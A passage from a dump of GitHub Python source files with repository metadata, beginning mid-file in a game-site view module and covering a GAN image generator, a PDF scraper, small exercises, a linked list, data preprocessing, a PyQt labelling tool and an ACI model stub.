required=True, extra=vol.ALLOW_EXTRA)\n\n\n@utils.log_time(loggers.web)\nasync def post_game(request: web.Request) -> web.Response:\n data = await request.post()\n game = await _get_game_or_error(request, data)\n _validate_hash(request, game, data[_PostGameInput.Keys.hash_])\n await events.post_game_finished_event(request, game)\n redirect_url = request.app.router['new_game'].url_for()\n return web.HTTPFound(redirect_url)\n\n\nasync def _get_game_or_error(request, data) -> models.Game:\n try:\n parsed_input = _PostGameInput.schema(dict(data))\n except vol.Invalid:\n loggers.web.info('bad request for post_game', exc_info=True)\n raise web.HTTPBadRequest\n keys = _PostGameInput.Keys\n try:\n result = models.GameResult(\n white_score=parsed_input[keys.white_score],\n black_score=parsed_input[keys.black_score])\n return models.Game(\n game_id=request.match_info['game_id'],\n white_id=parsed_input[keys.white_id],\n black_id=parsed_input[keys.black_id],\n result=result)\n except (models.ResultError, models.GameError):\n loggers.web.info('bad request for post_game', exc_info=True)\n raise web.HTTPBadRequest\n\n\ndef _validate_hash(request: web.Request, game: models.Game, actual_hash: str):\n expected_hash = game.get_hash(request.app['config'].game_hash_salt)\n if expected_hash != actual_hash:\n loggers.web.info('game hash mismatch: %r != %r', actual_hash, expected_hash)\n raise web.HTTPBadRequest\n\n\ndef _set_visited_cookie(view):\n async def wrapper(request):\n response = await view(request)\n response.set_cookie(_COOKIE_VISITED, '1')\n return response\n\n return functools.update_wrapper(wrapper, view)\n\n\n@utils.log_time(loggers.web)\n@_set_visited_cookie\n@aiohttp_jinja2.template('game.html')\nasync def show_game(request: web.Request) -> ta.DictOrResponse:\n white, black = await _find_two_random_functions_or_error(request.app['db_engine'])\n game = models.Game(\n game_id=uuid.uuid4().hex,\n white_id=white.function_id,\n black_id=black.function_id,\n result=models.UNKNOWN_RESULT)\n return {\n 'game': game,\n 'white': white,\n 'black': black,\n 'has_already_visited': (_COOKIE_VISITED in request.cookies),\n }\n\n\nasync def _find_two_random_functions_or_error(engine: ta.AsyncEngine):\n num_tries = 3\n for _ in range(num_tries):\n functions = await db.try_to_find_two_random_functions(engine)\n if _are_valid_functions(functions):\n return functions\n else:\n loggers.web.info('could not find two random functions with %d tries', num_tries)\n raise web.HTTPServiceUnavailable\n\n\ndef _are_valid_functions(functions: ta.Functions) -> bool:\n if len(functions) != 2:\n return False\n white, black = functions\n if white.repo_id == black.repo_id:\n return False\n return True\n\n\ndef _floor_to_full_nearest_multiply(x, n):\n return (x // n) * n\n","repo_name":"alexandershov/pymash","sub_path":"src/pymash/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4956,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"24410443935","text":"import os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.optim as optim\nimport torch.utils.data\nfrom torch.utils.data import Dataset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom torch.autograd import Variable\nfrom PIL import Image\nimport sys\n\n# Set random seed for reproducibility\nmanualSeed = 999\nprint(\"Random Seed: \", manualSeed)\nrandom.seed(manualSeed)\nnp.random.seed(manualSeed)\ntorch.manual_seed(manualSeed)\n\n# Root directory for dataset\nmodel_path = sys.argv[1]\noutput_dir = sys.argv[2]\nos.makedirs(output_dir, exist_ok=True)\n\noutput_size = 28\n\ntfm = transforms.Compose([\n transforms.ToPILImage(),\n transforms.Resize(output_size)])\n\n# Number of channels in the training images. For color images this is 3\nnc = 3\n\n# Size of z latent vector (i.e. size of generator input)\nnz = 100\n\n# Size of feature maps in generator\nngf = 80\n\n# Size of feature maps in discriminator\nndf = 80\n\n# Number of classes\nnum_label = 10\n \ndevice = torch.device(\"cuda\" if (torch.cuda.is_available()) else \"cpu\")\n\n# custom weights initialization called on netG and netD\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)\n\nclass Generator(nn.Module):\n def __init__(self, nz=nz, ngf=ngf):\n super(Generator, self).__init__()\n self.main = nn.Sequential(\n # input is Z, going into a convolution\n nn.ConvTranspose2d(nz, ngf * 8, 4, 1, 0, bias=False),\n nn.BatchNorm2d(ngf * 8),\n nn.ReLU(inplace=True),\n # state size. (ngf*8) x 4 x 4\n nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf * 4),\n nn.ReLU(inplace=True),\n # state size. (ngf*4) x 8 x 8\n nn.ConvTranspose2d( ngf * 4, ngf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf * 2),\n nn.ReLU(inplace=True),\n # state size. (ngf*2) x 16 x 16\n nn.ConvTranspose2d( ngf * 2, ngf, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf),\n nn.ReLU(inplace=True),\n # state size. (ngf) x 32 x 32\n nn.ConvTranspose2d( ngf, nc, 4, 2, 1, bias=False),\n nn.Tanh()\n # state size. (nc) x 64 x 64\n )\n \n def forward(self, input):\n return self.main(input)\n\n# Load model\nnetG = Generator(nz)\nnetG.load_state_dict(torch.load(model_path))\nnetG.eval()\nnetG.to(device)\n\n# Create 1000 latent vectors and embed label inside\nnum_sample = 1000\nnum_per_class = 100\nfixed_noise = torch.FloatTensor(num_sample, nz, 1, 1).normal_(0, 1)\nfixed_noise = Variable(fixed_noise).to(device)\nfixed_noise_ = np.random.normal(0, 1, (num_sample, nz))\nlabel = np.array([x * np.ones(num_per_class) for x in range(num_label)], dtype=np.int32).flatten()\nlabel_onehot = np.zeros((num_sample, num_label))\nlabel_onehot[np.arange(num_sample), label] = 1\nfixed_noise_[np.arange(num_sample), :num_label] = label_onehot[np.arange(num_sample)]\n\nfixed_noise_ = (torch.from_numpy(fixed_noise_))\nfixed_noise_ = fixed_noise_.resize_(num_sample, nz, 1, 1)\nfixed_noise.data.copy_(fixed_noise_)\n\n# Generate 1000 images and save them.\nimgs_sample = (netG(fixed_noise).data + 1) / 2.0 # denormalize\nfor idx, img in enumerate(imgs_sample, 0):\n img_label = idx // num_per_class\n img_idx = idx % num_per_class\n number = str(img_idx+1).zfill(3)\n img = tfm(img)\n img.save(os.path.join(output_dir, f'{img_label}_{number}.png'))\nprint(\"1000 images generated!\")\n","repo_name":"yiwei32/NTU_courses","sub_path":"2021_Fall/DLCV/hw2/p2_test.py","file_name":"p2_test.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22554188022","text":"import sys, os\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\nimport urllib\nimport pickle\nfrom tqdm import tqdm\n\n\ndef save_pickle(data, path):\n with open(path, 'wb') as f:\n pickle.dump(data, f)\n\n\nif __name__ == \"__main__\":\n _, output_dir = sys.argv\n \n link = \"https://www.kordi.or.kr/content.do?page=1&sf_category=N107_1&cmsId=173\"\n options = webdriver.ChromeOptions()\n options.add_experimental_option('prefs', {\n \"download.default_directory\": output_dir, #Change default directory for downloads\n \"download.prompt_for_download\": False, #To auto download the file\n \"download.directory_upgrade\": True,\n \"plugins.always_open_pdf_externally\": True #It will not show PDF directly in chrome\n })\n driver = webdriver.Chrome(options=options)\n\n num = 1\n docs = []\n while True:\n link = f\"https://www.kordi.or.kr/content.do?page={num}&sf_category=N107_1&cmsId=173\"\n driver.get(link)\n doc_list = driver.find_element(By.TAG_NAME, 'tbody').find_elements(By.TAG_NAME, 'a')\n if len(doc_list) == 0:\n break\n \n [docs.append(doc.get_attribute('href')) for doc in doc_list]\n \n num += 1\n \n save_pickle(docs, f\"./oldman_doc_list.p\") \n \n pdf_list = []\n for doc_link in tqdm(docs, desc='collect pdf link'):\n try:\n driver.get(doc_link)\n pdf = driver.find_element(By.XPATH, '//*[@id=\"sub_contents\"]/article/table/tbody/tr[4]/td').find_elements(By.TAG_NAME, 'a')\n \n [pdf_list.append(i.get_attribute('href')) for i in pdf]\n except:\n print('error doc !!!')\n print(doc_link)\n save_pickle(pdf_list, f\"./oldman_href_list.p\") \n\n [driver.get(pdf) for pdf in tqdm(pdf_list, desc='download pdf')]\n \n os.remove(f\"./oldman_doc_list.p\")\n os.remove(f\"./oldman_href_list.p\")","repo_name":"tkdalsrb123/Alchera","sub_path":"11/1113_db_crawling2/oldman.py","file_name":"oldman.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2066386758","text":"#!/usr/bin/python3\n\"\"\"\nA script that takes in a URL, email and sends POST request to the passed\nURL with the email as parameter and displays the body of the response\ndecoded in utf-8\n\"\"\"\nimport urllib.parse\nimport urllib.request\nimport sys\n\n\ndef post_request(url, email):\n # use parse.urlencode to encode the argument\n data = urllib.parse.urlencode({'email': email})\n # convert it in to bytes\n data = data.encode('ascii')\n # make an object request\n req = urllib.request.Request(url, data)\n\n# Use with to open url response and decode\n with urllib.request.urlopen(req) as response:\n undecoded_body = response.read()\n body = undecoded_body.decode('utf-8')\n print(body)\n\n\nif __name__ == \"__main__\":\n url = sys.argv[1]\n email = sys.argv[2]\n post_request(url, email)\n","repo_name":"FrancKenya/alx-higher_level_programming","sub_path":"0x11-python-network_1/2-post_email.py","file_name":"2-post_email.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18650615935","text":"#50. Write a Python program that reads two integers representing a month \n# and day and prints the season for that month and day.\n#a. Expected Output:\n#Input the month (e.g. January, February etc.): julyInput the day: 31\n#Season is autumn\n\nmonth=input(\"enter month\")\nday=int(input(\"enter day\"))\nif month==\"march\"or month==\"april\"or month==\"may\":\n if day>=1 and day<=30 or day>=1 and day<=31:\n print(\"spring\")\nelif month==\"june\"or month==\"july\"or month==\"auguset\":\n if day>=1 and day<=31 or day<=30:\n print(\"summer\")\nelif month==\"september\"or month==\"october\"or month==\"november\":\n if day>=1 and day<=30 or day<=31:\n print(\"autumn\")\nelif month==\"december\"or month==\"junuary\"or month==\"february\":\n if day>=1 and day<=28 or day<=30 and day<=31:\n print(\"winter\") \nelse:\n print(\"not\") ","repo_name":"shanti96/if-else","sub_path":"ifelse50 print season that month and day.py","file_name":"ifelse50 print season that month and day.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38305399528","text":"import pyudev as udevpy\nimport bluetooth\nimport subprocess as sp\n\ndef checkttyUSB0():\n print(\"[LiDAR] Checking LiDAR presence\")\n try:\n context = udevpy.Context()\n dev = udevpy.Device.from_device_file(context, '/dev/ttyUSB0')\n print(\"[LiDAR] LiDar Present\")\n print(\"[LiDAR] Device Name = \" + dev.sys_name)\n except Exception as e:\n # We weren't able to use pyudev (possibly because of an invalid operating system)\n print(\"[WARNING] LiDAR Not Present - \" + str(e))\n pass\n return None\n\ndef checkttyACM0():\n print(\"[Arduino] Checking Arduino presence\")\n try:\n context = udevpy.Context()\n dev = udevpy.Device.from_device_file(context, '/dev/ttyArduinoProgram')\n print(\"[Arduino] Arduino Present\")\n print(\"[Arduino] Device Name = \" + dev.sys_name)\n except Exception as e:\n # We weren't able to use pyudev (possibly because of an invalid operating system)\n print(\"[WARNING] Arduino Not Present - \" + str(e))\n print(e)\n pass\n return None\n\ndef checkBluetooth():\n # C8:3F:26:F8:65:E8\n print(\"[Xbox-Controller] Checking Xbox-Controller presence\")\n process = sp.Popen(['hcitool', 'con'], stdout=sp.PIPE, stderr=sp.PIPE)\n out, err = process.communicate()\n print(out)\n if \"C8:3F:26:F8:65:E8\" in out.split():\n print(\"[Xbox-Controller] Xbox-one controller is connected\")\n else:\n print(\"[Xbox-Controller] Xbox-one controller that is stored is not Found , Other Connected Devices are as below\")\n print(out)\n return()\n\ncheckttyUSB0()\ncheckttyACM0()\ncheckBluetooth()","repo_name":"furhadjidda/astro","sub_path":"raspberry_pi/src/astro_base/script/astro_diagnotics.py","file_name":"astro_diagnotics.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12913916602","text":"class LinkedListNode:\n def __init__(self, data):\n self.data = data\n self.next_node = None\n \n def __str__(self):\n return str(self.data)\n\n def insert_after(self, data):\n temp = self.next_node\n self.next_node = new_node = LinkedListNode(data)\n new_node.next_node = temp\n\nclass SinglyLinkedList:\n def __init__(self, head = None, values = None, sort = True):\n self.head = head\n self.tail = head\n self.values = values\n if self.values:\n if sort:\n self.insert_values_in_order()\n else:\n self.insert_values()\n\n def insert(self, data):\n if not self.head:\n self.head = self.tail = LinkedListNode(data)\n else:\n self.tail.next_node = self.tail = LinkedListNode(data)\n \n def insert_values(self):\n for value in self.values:\n self.insert(value)\n\n def delete(self, data):\n if self.head.data == data:\n self.head = self.head.next_node\n else:\n node = self.head\n previous = None\n while node.data != data:\n previous = node\n node = node.next_node\n previous.next_node = node.next_node\n\n def search(self, data):\n node = self.head\n while node.next_node:\n if node.data == data:\n return node\n node = node.next_node\n raise Exception(\"Data not found\")\n\n def insert_in_order(self, data):\n node = self.head\n print(data)\n if not self.head:\n self.head = LinkedListNode(data)\n elif self.head.data >= data:\n self.head = LinkedListNode(data)\n self.head.next_node = node\n else:\n while node.next_node:\n if node.next_node.data >= data:\n node.insert_after(data)\n return\n node = node.next_node\n node.next_node = LinkedListNode(data)\n \n def insert_values_in_order(self):\n for value in self.values:\n self.insert_in_order(value)\n\n def __repr__(self):\n if self.head:\n node = self.head\n node_string = str(node.data)\n while node.next_node:\n node_string = node_string + f\" => {node.next_node.data}\"\n node = node.next_node\n return node_string\n return \"None\"\n\ndef test_insert_in_order():\n ll = SinglyLinkedList()\n ll_2 = SinglyLinkedList()\n vals = [1,5,3,2,4,5]\n\n ll.insert_in_order(1)\n print(ll)\n assert ll.__repr__() == '1'\n\n ll.insert_in_order(3)\n print(ll)\n assert ll.__repr__() == '1 => 3'\n\n ll.insert_in_order(4)\n print(ll)\n assert ll.__repr__() == '1 => 3 => 4'\n\n ll.insert_in_order(2)\n print(ll)\n assert ll.__repr__() == '1 => 2 => 3 => 4'\n\n ll.insert_in_order(0)\n print(ll)\n assert ll.__repr__() == '0 => 1 => 2 => 3 => 4'\n\n ll.insert_in_order(-1)\n print(ll)\n assert ll.__repr__() == '-1 => 0 => 1 => 2 => 3 => 4'\n\n from random import randint\n\n for num in [chr(randint(60,90)) for num in range(40)]:\n ll_2.insert_in_order(num)\n\n head = ll_2.head\n while head.next_node:\n assert head.next_node.data >= head.data\n head = head.next_node\n \n print(ll_2)\n\ntest_insert_in_order()","repo_name":"bibbycodes/data_structures","sub_path":"lib/ds/singly_linked_list.py","file_name":"singly_linked_list.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4685865655","text":"import numpy as np\nimport pandas as pd\nimport plotly as p\n\nfrom configurations import FILTERED, VACINA\nfrom utils import join\nfrom graphs import bar, stacked_area, overlaid_area\n\ndef grafico_areas_empilhadas(df):\n semana_aplicaca_por_vacina = \\\n df.groupby(by=['Semana de aplicação', 'Nome da vacina', 'Estado']).apply(\n lambda e: pd.DataFrame({'Total (semana)': [len(e)]})).reset_index()\n\n #print(\"original\", semana_aplicaca_por_vacina)\n semana_aplicaca_por_vacina = semana_aplicaca_por_vacina[\n ['Estado', 'Semana de aplicação', 'Total (semana)', 'Nome da vacina']]\n\n semana_aplicaca_por_vacina.to_csv(\"areas_empilhadas.csv\", index=False)\n\ndef grafico_total_vacinas_tipo_dose(df):\n # df = pd.concat([df, pd.DataFrame(\n # {'Semana de aplicação': [i for i in range(30)], 'Dose': ['Vacinação completa'] * 30})], sort=True,\n # ignore_index=True)\n # df = pd.concat([df, pd.DataFrame(\n # {'Semana de aplicação': [i for i in range(30)], 'Dose': ['Primeira dose'] * 30})], sort=True,\n # ignore_index=True)\n semana_aplicacao_dose = df.groupby(by=['Estado', 'Semana de aplicação', 'Dose']).apply(\n lambda e: pd.DataFrame({'Total (semana)': [len(e)]})).reset_index()[\n ['Estado', 'Semana de aplicação', 'Dose', 'Total (semana)']]\n\n semana_aplicacao_dose.to_csv(\"total_dose.csv\", index=False)\n\nif __name__ == \"__main__\":\n\n file = \"vacina_preprocessado.csv\"\n saida = \"vacina_preprocessado_2.csv\"\n n = 0\n # ['Dose', 'Semana de aplicação', 'Nome da vacina', 'Estado]\n df = pd.read_csv(file, encoding='UTF-8')\n\n #grafico_areas_empilhadas(df)\n\n grafico_total_vacinas_tipo_dose(df)\n","repo_name":"claudiovaliense/visualizacao_covid","sub_path":"capanema/2_pre_processing.py","file_name":"2_pre_processing.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8952057701","text":"import sys, math\nfrom PyQt5.QtWidgets import (QApplication, QMainWindow, QPushButton,\n QLabel, QWidget, QHBoxLayout, QVBoxLayout,\n QListWidget, QFileDialog, QGroupBox,\n QRadioButton)\nfrom PyQt5.QtGui import QIcon, QPixmap, QImage , QPainter,QBrush, QPen, QFont, QPalette, QColor\nfrom PyQt5.QtCore import Qt, QRect, QPoint, QTimer, QObject\nfrom cv2 import imread, resize, cvtColor, COLOR_BGR2RGB\nfrom Libs.data import *\nfrom Libs.util import *\nimport os\n\nlabel_item_len=11\nstatue = [False for i in range(label_item_len)]\n\n\nclass human_attrition_ui(QWidget):\n def __init__(self, parent=None):\n super(human_attrition_ui, self).__init__(parent)\n self.face_attri = [\"Blackhair\", \"Blury\", \"Eyeglass\", \"Male\", \"Smile\", \"Younge\"]\n self.huamn_attri = [\"gender\", \"hat\", \"backpack\", \"bag\", \"age\"]\n self.sum_attribute = self.face_attri + self.huamn_attri\n self.huamn_attri_buttons = []\n self.label_item_len = len(self.face_attri) + len(self.huamn_attri)\n\n self.initUI()\n\n def initUI(self):\n self.face_layput = QVBoxLayout()\n\n palette = QPalette()\n palette.setColor(QPalette.WindowText, QColor(128, 0, 0))\n face = QLabel(\"Face Attribute:\")\n face.setFont(QFont(\"Face\", 10, QFont.Bold))\n face.setPalette(palette)\n\n human = QLabel(\"Body Attribute\")\n human.setFont(QFont(\"Face\", 10, QFont.Bold))\n human.setPalette(palette)\n\n self.face_layput.addWidget(face)\n\n for i in self.face_attri:\n group = QGroupBox()\n # group.setTitle(i)\n flayer = QHBoxLayout(group)\n button1 = QRadioButton('1')\n button2 = QRadioButton('2')\n button1.setChecked(True)\n\n button1.setObjectName(\"{}_1\".format(i))\n button2.setObjectName(\"{}_2\".format(i))\n button1.toggled.connect(self.toogle_deal)\n button2.toggled.connect(self.toogle_deal)\n\n flayer.addWidget(QLabel(i))\n flayer.addStretch()\n flayer.addWidget(button1)\n flayer.addWidget(button2)\n flayer.setAlignment(Qt.AlignRight)\n self.face_layput.addWidget(group)\n\n self.huamn_attri_buttons.append(button1)\n self.huamn_attri_buttons.append(button2)\n\n self.huamn_layput = QVBoxLayout()\n self.huamn_layput.addWidget(human)\n\n for j in self.huamn_attri:\n group = QGroupBox()\n # group.setTitle(j)\n hlayer = QHBoxLayout(group)\n hbutton1 = QRadioButton('1')\n hbutton2 = QRadioButton('2')\n hbutton1.setChecked(True)\n\n hbutton1.setObjectName(\"{}_1\".format(j))\n hbutton2.setObjectName(\"{}_2\".format(j))\n\n hbutton1.toggled.connect(self.toogle_deal)\n hbutton2.toggled.connect(self.toogle_deal)\n\n hlayer.addWidget(QLabel(j))\n hlayer.addStretch()\n hlayer.addWidget(hbutton1)\n hlayer.addWidget(hbutton2)\n hlayer.setAlignment(Qt.AlignRight)\n self.huamn_layput.addWidget(group)\n\n self.huamn_attri_buttons.append(hbutton1)\n self.huamn_attri_buttons.append(hbutton2)\n\n self.mainlayout = QVBoxLayout(self)\n\n self.mainlayout.addLayout(self.face_layput)\n self.mainlayout.addSpacing(30)\n self.mainlayout.addLayout(self.huamn_layput)\n\n timer = QTimer(self)\n timer.setInterval(20)\n timer.timeout.connect(self.timerEven)\n timer.start(20)\n\n def timerEven(self):\n self.updates()\n\n def updates(self):\n for i in range(label_item_len):\n if statue[i] == False:\n self.huamn_attri_buttons[i * 2].setChecked(True)\n else:\n self.huamn_attri_buttons[i * 2+1].setChecked(True)\n\n\n def toogle_deal(self):\n sender, num = self.sender().objectName().split('_')\n\n if num == '1':\n index = self.sum_attribute.index(sender)\n if self.huamn_attri_buttons[index*2].isChecked() == True:\n statue[index] = False\n else:\n statue[index] = True\n\n\nclass Labelattr(QWidget):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.points = [QPoint(0, 0)]\n self.coordinates = []\n self.attri = []\n self.clickbox = 0\n self.initUI()\n\n def change_coordinate_display(self, coor):\n self.coordinates.clear()\n self.attri.clear()\n self.img_size = coor['size']\n self.widget_size = self.size()\n for instance in coor['coor']:\n instance_coor = []\n for box in instance:\n xmin = box[0] * (self.widget_size.width() / self.img_size[0])\n ymin = box[1] * (self.widget_size.height() / self.img_size[1])\n xmax = box[2] * (self.widget_size.width() / self.img_size[0])\n ymax = box[3] * (self.widget_size.height() / self.img_size[1])\n instance_coor.append((QPoint(xmin, ymin), QPoint(xmax, ymax)))\n self.coordinates.append((instance_coor[0], instance_coor[1]))\n self.attri.append([False for i in range(11)])\n self.update()\n\n def initUI(self):\n self.setMinimumSize(1000, 800)\n self.img = QImage(cvtColor(resize(imread(\"./icons/logo.jpg\"), (1000, 800)), COLOR_BGR2RGB), 1000, 800, QImage.Format_RGB888)\n self.counter=0\n\n def update_display(self, filename):\n self.img = QImage(cvtColor(resize(imread(filename), (1000, 800)), COLOR_BGR2RGB), 1000, 800, QImage.Format_RGB888)\n self.update()\n\n def timer_event(self):\n # self.show()\n self.counter = self.counter+1\n\n\n def paintEvent(self, event):\n\n qp = QPainter()\n qp.begin(self)\n self.drawPoints(qp)\n qp.end()\n\n\n def drawPoints(self, qp):\n color = [Qt.red, Qt.green, Qt.blue, Qt.yellow]\n qp.drawImage(QRect(0, 0, 1000, 800), self.img)\n\n qp.setBrush(QBrush(Qt.black, Qt.BDiagPattern))\n\n for item1, coordinate in enumerate(self.coordinates):\n qp.setPen(color[item1%4])\n for item2, coor in enumerate(coordinate):\n qp.drawRect(QRect(coor[0], coor[1]))\n\n if len(self.coordinates) >=1:\n for coor in self.coordinates[self.clickbox]:\n qp.setPen(color[self.clickbox % 4])\n qp.setBrush(QBrush(Qt.green, Qt.BDiagPattern))\n qp.drawRect(QRect(coor[0], coor[1]))\n\n if len(self.points) % 2 == 0:\n qp.drawRect(QRect(self.points[-1], self.points[0]))\n\n def mousePressEvent(self, mousePress_even):\n pos = mousePress_even.pos()\n candidate = []\n global statue\n\n self.attri[self.clickbox] = statue\n for item1, coordinate in enumerate(self.coordinates):\n if coordinate[1][0].x() < pos.x() and coordinate[1][0].y() < pos.y() and \\\n coordinate[1][1].x()>pos.x() and coordinate[1][1].y()>pos.y():\n candidate.append(item1)\n break\n if len(candidate) == 0:\n return\n\n self.clickbox = candidate[0]\n statue = self.attri[self.clickbox]\n print(statue)\n print()\n self.update()\n\n\nclass MainWindow(QWidget):\n def __init__(self):\n super().__init__()\n self.initUI()\n self.cwd = os.getcwd()\n self.Image_list = []\n self.saveDirectory = \"./Annotations\"\n\n\n def Label_load_xml(self, filename):\n self.display.update_display(filename)\n label = Label_get_instance(os.path.splitext(filename)[0]+'.xml')\n faces = []\n bodys_t = []\n bodys = []\n for instance in label['instance']:\n if instance['name'] == 'head':\n faces.append(instance['bndbox'])\n elif instance['name'] == 'human':\n bodys_t.append(instance['bndbox'])\n else:\n print(\"label type unknow\")\n exit()\n for item, face in enumerate(faces):\n for body_t in bodys_t:\n if compute_iou(face, body_t)>0.85 and abs(body_t[1]- face[1]) < 50:\n bodys.append(body_t)\n break\n self.coor = list(zip(faces, bodys))\n\n self.display.change_coordinate_display({\"size\":label['size'], \"coor\":self.coor})\n\n def Label_save_xml(self):\n attri = self.display.attri\n box = self.display.coordinates\n size =self.display.img_size\n\n imgpath = os.path.join(self.ImagefilesDirectort, self.filelistwidget.currentItem().text())\n instances = zip(self.coor, attri)\n save_dir = os.path.join(self.saveDirectory, self.filelistwidget.currentItem().text().split('.')[0]+'.xml')\n Label_write_instance(imgpath, size, instances, save_dir)\n\n\n def initUI(self):\n openbutton = QPushButton(\"Open\", )\n openbutton.setIcon(QIcon(\"icons/open.png\"))\n openbutton.setMinimumSize(80, 80)\n\n opendbutton = QPushButton(\"Open Dir\")\n opendbutton.setIcon(QIcon(\"icons/open.png\"))\n opendbutton.setMinimumSize(80, 80)\n\n savebutton = QPushButton(\"Save\")\n savebutton.setIcon(QIcon(\"icons/save.png\"))\n savebutton.setMinimumSize(80, 80)\n\n saveasbutton = QPushButton(\"Save as\")\n saveasbutton.setIcon(QIcon(\"icons/save.png\"))\n saveasbutton.setMinimumSize(80, 80)\n\n nextbutton = QPushButton(\"next\")\n nextbutton.setIcon(QIcon(\"icons/next.png\"))\n nextbutton.setMinimumSize(80, 80)\n\n prebutton = QPushButton(\"pre\")\n prebutton.setIcon(QIcon(\"icons/prev.png\"))\n prebutton.setMinimumSize(80, 80)\n\n openbutton.clicked.connect(self.MessageClicked)\n opendbutton.clicked.connect(self.MessageClicked)\n savebutton.clicked.connect(self.MessageClicked)\n nextbutton.clicked.connect(self.MessageClicked)\n prebutton.clicked.connect(self.MessageClicked)\n\n toolhbox = QVBoxLayout()\n toolhbox.addWidget(openbutton)\n toolhbox.addWidget(opendbutton)\n toolhbox.addWidget(savebutton)\n toolhbox.addWidget(saveasbutton)\n\n toolhbox.addWidget(nextbutton)\n toolhbox.addWidget(prebutton)\n\n\n mydraw = QVBoxLayout()\n self.display = Labelattr()\n mydraw.addWidget(self.display)\n self.filelistwidget = QListWidget()\n self.filelistwidget.doubleClicked.connect(self.list_doubleclick)\n\n self.myradio = human_attrition_ui()\n\n mainlayout = QHBoxLayout(self)\n\n mainlayout.addLayout(toolhbox)\n mainlayout.addLayout(mydraw)\n mainlayout.addWidget(self.myradio)\n mainlayout.addWidget(self.filelistwidget)\n\n self.setLayout(mainlayout)\n\n # self.setGeometry(200, 200, 1000, 800)\n self.setWindowTitle(\"Labelattri\")\n self.setWindowIcon(QIcon(\"./icons/huaji.png\"))\n\n\n\n# 消息框处理队列\n def MessageClicked(self, event):\n sender = self.sender()\n message_type = sender.text()\n Support_image_format = [\"bmp\",\"jpg\", \"jpeg\", \"png\", \"tif\"]\n if message_type == \"Open\":\n filename, filetype = QFileDialog.getOpenFileName(self,\n \"Image file\",\n self.cwd,\n \"Image Files(*.bmp *.jpg *.jpeg *.png *.tif)\"\n )\n # self.display.update_display(filename)\n\n elif message_type == \"Open Dir\":\n self.ImagefilesDirectort = QFileDialog.getExistingDirectory(self,\n \"Image files\",\n self.cwd\n )\n self.Image_list.clear()\n self.filelistwidget.clear()\n for file in os.listdir(self.ImagefilesDirectort):\n if file.split('.')[-1] in Support_image_format:\n self.Image_list.append(file)\n self.filelistwidget.addItem(file)\n self.Label_load_xml(os.path.join(self.ImagefilesDirectort, self.Image_list[0]))\n\n elif message_type == \"Save\":\n # self.saveDirectory = QFileDialog.getSaveFileName(self,\n # 'Save as',\n # self.cwd,\n # \"Label Files(*.txt *.json *.xml )\"\n #\n # )\n self.Label_save_xml()\n elif message_type == \"Save as\":\n self.saveDirectory = QFileDialog.getSaveFileName(self,\n 'Save as',\n self.cwd,\n \"Label Files(*.txt *.json *.xml )\"\n )\n elif message_type == \"next\":\n self.Label_load_xml(os.path.join(self.ImagefilesDirectort, self.Image_list[0]))\n\n # elif message_type == \"pre\":\n\n\n def list_doubleclick(self):\n self.Label_load_xml(os.path.join(self.ImagefilesDirectort, self.filelistwidget.currentItem().text()))\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n labeltool = MainWindow()\n labeltool.show()\n # print(labeltool.size())\n sys.exit(app.exec_())\n\n# ui转py\n# 1\n# python -m PyQt5.uic.pyuic demo.ui -o demo.py\n\n\n\n\n","repo_name":"JunjieZhouwust/Labelattri","sub_path":"labelattri.py","file_name":"labelattri.py","file_ext":"py","file_size_in_byte":13573,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"24739872098","text":"from cobra.mit.meta import ClassMeta\nfrom cobra.mit.meta import StatsClassMeta\nfrom cobra.mit.meta import CounterMeta\nfrom cobra.mit.meta import PropMeta\nfrom cobra.mit.meta import Category\nfrom cobra.mit.meta import SourceRelationMeta\nfrom cobra.mit.meta import NamedSourceRelationMeta\nfrom cobra.mit.meta import TargetRelationMeta\nfrom cobra.mit.meta import DeploymentPathMeta, DeploymentCategory\nfrom cobra.model.category import MoCategory, PropCategory, CounterCategory\nfrom cobra.mit.mo import Mo\n\n\n# ##################################################\nclass Route(Mo):\n \"\"\"\n Mo doc not defined in techpub!!!\n\n \"\"\"\n\n meta = ClassMeta(\"cobra.model.fabrgm.Route\")\n\n meta.moClassName = \"fabrgmRoute\"\n meta.rnFormat = \"src-[%(src)s]-grp-[%(grp)s]\"\n meta.category = MoCategory.REGULAR\n meta.label = \"Fabric Group Manager mroute\"\n meta.writeAccessMask = 0x8008020040001\n meta.readAccessMask = 0x8008020040001\n meta.isDomainable = False\n meta.isReadOnly = True\n meta.isConfigurable = False\n meta.isDeletable = False\n meta.isContextRoot = False\n\n 